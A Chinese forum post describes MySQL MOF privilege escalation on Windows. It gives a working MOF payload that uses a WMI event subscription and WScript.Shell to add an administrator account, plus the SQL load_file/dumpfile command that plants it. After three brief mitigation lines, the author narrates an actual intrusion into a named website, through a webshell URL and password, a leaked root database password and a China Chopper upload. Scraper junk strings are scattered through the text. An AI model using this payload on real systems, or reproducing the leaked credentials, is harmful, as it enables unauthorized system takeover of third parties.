Mysql mof扩展漏洞实例与防范

admin

Mysql mof扩展漏洞防范方法

3 p9 h) ]1 A- B* Z, V1 F9 L, @网上公开的一些利用代码:
: j6 |- m" [/ p' s) m- C" r/ G* x
#pragma namespace(“\\\\.\\root\\subscription”)

instance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };
1 i$ Z) Z# G# g# L7 V1 X! Y3 |



% Z4 I, ^' ?2 z! p
  m; t0 d* p+ R/ _( c连接mysql数据库后执行： select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
从上面代码来看得出解决办法：

  k( E! e9 `% _8 f1、mysql用户权限控制，禁止 “load_file”、”dumpfile”等函数

7 d+ ]. b3 s$ E, P2、禁止使用”WScript.Shel”组件

3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER

当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下
4 o$ D" J7 H+ v5 G" S: j
事情是这样发生的  一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权

但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容
. }7 r+ o: m8 |9 l+ U
- t7 b3 o9 T/ T5 V看懂了后就开始练手吧
9 S) k3 j3 ]4 u" f1 Q9 z
/ v/ m. g7 p5 y' h! [  z" \( a, Qhttp://www.webbmw.com/config/config_ucenter.php 一句话 a
! _  I2 M5 H# r, d* V1 @  ^
$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
: {4 `0 ~+ ]$ r& m. i* \4 n- J
于是直接用菜刀开搞
8 O1 Z5 B9 I+ S, }2 G
上马先
" x8 E; j; c' y
既然有了那些账号 之类的 于是我们就执行吧…….

小小的说下

在这里第1次执行未成功        原因未知
7 l" ^3 {* o! ^* l- I/ y
8 |* A1 K& T9 ^! F/ L9 p我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。
1 p4 a  C5 O: R* _- d0 |
#pragma namespace(“\\\\.\\root\\subscription”)

instance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };

我是将文件放到C:\WINDOWS\temp\1.mof

) j& z8 d9 ]& V, v1 t' n所以我们就改下执行的代码
: g& i6 ~5 u- ~* }' K2 X3 Y4 c0 G
select load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;

  G! o& p* z& \6 _

* |$ V+ c' K! E( Q) m  w但是 你会发现账号还是没有躺在那里。。
8 ?7 B; j5 n5 D+ s% ?
) e* L2 |. m& p8 ]9 u8 v于是我就感觉蛋疼
" _3 j+ z6 g' I" U
/ \, y' ~' F, L' f6 K2 @- l9 D# u& i就去一个一个去执行 但是执行到第2个 mysql时就成功了………


' I0 S0 G$ q* k( f3 C
但是其他库均不成功…
, @2 e3 E0 y! Q  o; g5 k
我就很费解呀 到底为什么不成功求大牛解答…
4 o  Z- B' r0 o$ X
$ H. S8 d% A: n7 O$ T$ o: c. k0 V​

, Y9 B: N! a6 \8 X$ Z7 U